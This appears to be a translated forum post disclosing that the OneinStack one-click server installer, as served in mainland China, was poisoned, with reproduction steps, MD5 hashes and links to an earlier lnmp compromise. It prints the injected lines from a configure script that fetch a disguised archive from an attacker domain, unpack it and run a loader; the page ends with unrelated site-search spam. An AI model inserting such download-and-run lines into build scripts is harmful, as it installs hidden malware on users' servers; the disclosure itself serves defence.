After being poisoned in May, the OneinStack one-click installation package was poisoned again. What is interesting is the malicious domain name and LNMP one-click installation package were poisoned. The malicious domain name registration time for the same day.

How to reproduce

(No such problem has been found when downloading from overseas nodes)

mirrors.oneinstack.com CNAME to seo-one-01.xnsksstack.com, the DNS of this domain name is DNSPod, and the resolution in mainland China is CNAME mirrors.oneinstack.com.w. cdngslb.com. Alibaba Cloud CDN (contains malicious code), overseas resolution is A 47.251.13.6 Alibaba Cloud US node

# Mainland China machine or manually specify mirrors.oneinstack.com.w.cdngslb.com Mainland China IP wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz tar -xzf oneinstack-full.tar.gz cd oneinstack/src tar -xzf pcre-8.45.tar.gz cd pcre-8.45 grep -r "oneinstack.club" pcre-8.45

Result (pcre-8.45/configure line 6883):

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

Verify MD5:

# Malicious package md5sum oneinstack-full.tar.gz 3dc788dd9fe0c13e3db1411e53932331 oneinstack-full.tar.gz #Overseas node package (no such problem has been found yet) aa55626f6ba9eb8cae2f5a3d9c6c9b96 oneinstack-full.tar.gz

Comparison of overseas outsourcing in mainland China (overseas on the right and mainland China on the left):

root@Huangxins-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/ /root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg /root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null /root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg /root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE

and lnmp.org and the Oneinstack hack half a year ago (GitHub).

The malicious domain name oneinstack.club was registered on 2023-08-28, which is consistent with the registration date and registrar of lnmp’s malicious domain name lnmp.life.

Citation of this article: https://v2ex.com/t/979226

Recommended site search: virtual host space, forum host, vps US server, domain name free registration 0 yuan registration, virtual host rental, http proxy ip, ip address search, Hong Kong host high defense, foreign domain names, Hong Kong host high defense,